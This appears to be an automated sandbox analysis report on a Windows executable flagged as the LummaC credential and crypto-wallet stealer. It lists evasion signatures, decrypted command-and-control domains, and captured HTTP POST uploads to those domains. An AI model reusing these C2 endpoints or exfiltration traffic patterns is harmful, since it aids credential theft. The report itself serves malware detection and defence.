Windows Analysis Report
FvbuInU.exe

Overview

General Information

Sample name: FvbuInU.exe
Analysis ID: 1632098
MD5: a4069f02cdd899c78f3a4ee62ea9a89a
SHA1: c1e22136f95aab613e35a29b8df3cfb933e4bda2
SHA256: 3342c1acf9c247d7737a732ed3e1b3cf64be072b4094f41d50fc1c0ee944d6f4
Tags: exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FvbuInU.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\FvbuInU.exe" MD5: A4069F02CDD899C78F3A4EE62EA9A89A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: FvbuInU.exe PID: 7544 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: FvbuInU.exe PID: 7544 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.FvbuInU.exe.d60000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T19:37:30.899123+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49687 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:36.436560+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49688 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:41.094080+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49689 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:46.246258+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49690 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:52.577430+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49691 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:15.919366+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49694 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:23.280842+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49695 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:31.004250+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49696 | 188.114.96.3 | 443 | TCP

              AV Detection

Source: FvbuInU.exe | Avira: detected
Source: https://begindecafer.world/QwdZdf | Avira URL Cloud: Label: malware
Source: https://begindecafer.world/QwdZdfU | Avira URL Cloud: Label: malware
Source: https://begindecafer.world/ | Avira URL Cloud: Label: malware
Source: https://begindecafer.world:443/QwdZdflt-release/key4.dbPK | Avira URL Cloud: Label: malware
Source: FvbuInU.exe | Virustotal: Detection: 76%
Source: FvbuInU.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: nebdulaq.digital/aQwdw
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fostinjec.today/LksNAz
Source: C:\Users\user\Desktop\FvbuInU.exe | Code function: 0_2_00D7B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe | Code function: 0_2_00D7B55A CryptUnprotectData,0_2_00D7B55A
Source: FvbuInU.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49687 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49688 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49696 version: TLS 1.2
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49688 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49687 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49690 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49696 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49689 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 104.21.53.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49694 -> 104.21.53.52:443
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=RX3IfGZa8M
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 14875
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=vfAsqCzce7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15056
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QQBZoM6TdV2vZ1kvP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19948
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9XD6Apa4PxGA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2530
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=p56hhj6bi9XWGA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 588308
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 85
    Host: nebdulaq.digital
Source: global traffic | HTTP traffic detected:
    POST /QwdZdf HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 85
    Host: begindecafer.world
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: nebdulaq.digital
Source: global traffic | DNS traffic detected: DNS query: begindecafer.world
Source: unknown | HTTP traffic detected:
    POST /aQwdw HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: nebdulaq.digital
              Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
              Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: FvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: FvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49689
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49688
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknown. Network traffic detected: HTTP traffic on port 49695 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49695
              Source: unknown. Network traffic detected: HTTP traffic on port 49694 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49694
              Source: unknown. Network traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown. Network traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 49689 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknown. Network traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49687 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49688 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49689 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49690 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49691 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49694 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49695 version: TLS 1.2
              Source: unknown. HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49696 version: TLS 1.2

              System Summary

              Source: FvbuInU.exe. Static PE information: section name:
              Source: FvbuInU.exe. Static PE information: section name: .idata
              Source: FvbuInU.exe. Static PE information: section name:
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED0BE80_2_00ED0BE8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D6CBD00_2_00D6CBD0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E4CBEA0_2_00E4CBEA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E28BF30_2_00E28BF3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EACBF40_2_00EACBF4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E76BC30_2_00E76BC3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0EBC90_2_00E0EBC9
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E96BD80_2_00E96BD8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E66BDB0_2_00E66BDB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E5ABA90_2_00E5ABA9
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE8B850_2_00DE8B85
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E46BB90_2_00E46BB9
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E56B8D0_2_00E56B8D
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E90B960_2_00E90B96
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E98B6B0_2_00E98B6B
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D62B500_2_00D62B50
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E08B720_2_00E08B72
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E3EB770_2_00E3EB77
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ECAB700_2_00ECAB70
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E7CB520_2_00E7CB52
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA4B600_2_00DA4B60
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED6B280_2_00ED6B28
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E32B2B0_2_00E32B2B
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E78B3E0_2_00E78B3E
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE2B040_2_00DE2B04
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E12B3A0_2_00E12B3A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC4B050_2_00EC4B05
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D68B200_2_00D68B20
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC2CEF0_2_00EC2CEF
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E16CC20_2_00E16CC2
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF4CF70_2_00DF4CF7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E68CC90_2_00E68CC9
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED8CD70_2_00ED8CD7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E24CB00_2_00E24CB0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E44CBD0_2_00E44CBD
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DACC800_2_00DACC80
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E94CB50_2_00E94CB5
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF0CA20_2_00DF0CA2
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D7B1D80_2_00D7B1D8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ECEC610_2_00ECEC61
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DD8C480_2_00DD8C48
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB2C580_2_00EB2C58
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC8C200_2_00EC8C20
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E72C310_2_00E72C31
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DFAC060_2_00DFAC06
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED6C0C0_2_00ED6C0C
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DDAC300_2_00DDAC30
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA8C1C0_2_00EA8C1C
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EBAC110_2_00EBAC11
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE2DDB0_2_00DE2DDB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E00DCF0_2_00E00DCF
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E30DD30_2_00E30DD3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E4CDA20_2_00E4CDA2
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E6EDB50_2_00E6EDB5
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF8D850_2_00DF8D85
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0CDBA0_2_00E0CDBA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1CD800_2_00E1CD80
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA6D880_2_00EA6D88
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E36D850_2_00E36D85
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF6DB20_2_00DF6DB2
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E42D970_2_00E42D97
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2AD9D0_2_00E2AD9D
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E10D610_2_00E10D61
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E18D680_2_00E18D68
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D7CD450_2_00D7CD45
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E80D7F0_2_00E80D7F
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E88D750_2_00E88D75
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EAAD2A0_2_00EAAD2A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E7ED230_2_00E7ED23
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E6CD120_2_00E6CD12
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC6D190_2_00EC6D19
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ECAD160_2_00ECAD16
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DDED210_2_00DDED21
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2CEF60_2_00E2CEF6
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E9CEF10_2_00E9CEF1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D7EEFE0_2_00D7EEFE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE0EEE0_2_00DE0EEE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB4EDD0_2_00EB4EDD
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E02EA80_2_00E02EA8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E5EEB30_2_00E5EEB3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E04E810_2_00E04E81
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E96E810_2_00E96E81
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00F96E8B0_2_00F96E8B
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA2E9F0_2_00EA2E9F
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DDCE580_2_00DDCE58
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E50E440_2_00E50E44
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E52E410_2_00E52E41
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0AE480_2_00E0AE48
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EBEE470_2_00EBEE47
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB8E580_2_00EB8E58
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E32E2E0_2_00E32E2E
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EAEE340_2_00EAEE34
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DECE240_2_00DECE24
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E58E180_2_00E58E18
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E34FE30_2_00E34FE3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DEAFDA0_2_00DEAFDA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E60FC30_2_00E60FC3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA2FF00_2_00DA2FF0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1EFCE0_2_00E1EFCE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E46FD40_2_00E46FD4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E90FDB0_2_00E90FDB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E4EFD00_2_00E4EFD0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB0FDE0_2_00EB0FDE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D76F900_2_00D76F90
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E20FA80_2_00E20FA8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA0FA40_2_00EA0FA4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB2FBD0_2_00EB2FBD
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC8FB00_2_00EC8FB0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E6AF880_2_00E6AF88
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0EF920_2_00E0EF92
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E56F900_2_00E56F90
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED4F6D0_2_00ED4F6D
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DD0F4B0_2_00DD0F4B
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF6F440_2_00DF6F44
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E98F5F0_2_00E98F5F
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E4AF530_2_00E4AF53
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E74F5A0_2_00E74F5A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF2F1C0_2_00DF2F1C
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E3CF200_2_00E3CF20
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E92F2A0_2_00E92F2A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DD2F1A0_2_00DD2F1A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E14F2F0_2_00E14F2F
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E6EF320_2_00E6EF32
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E690E40_2_00E690E4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED90EB0_2_00ED90EB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E230F50_2_00E230F5
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE90C70_2_00DE90C7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DF50C10_2_00DF50C1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA90EF0_2_00DA90EF
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E010DB0_2_00E010DB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E9F0BE0_2_00E9F0BE
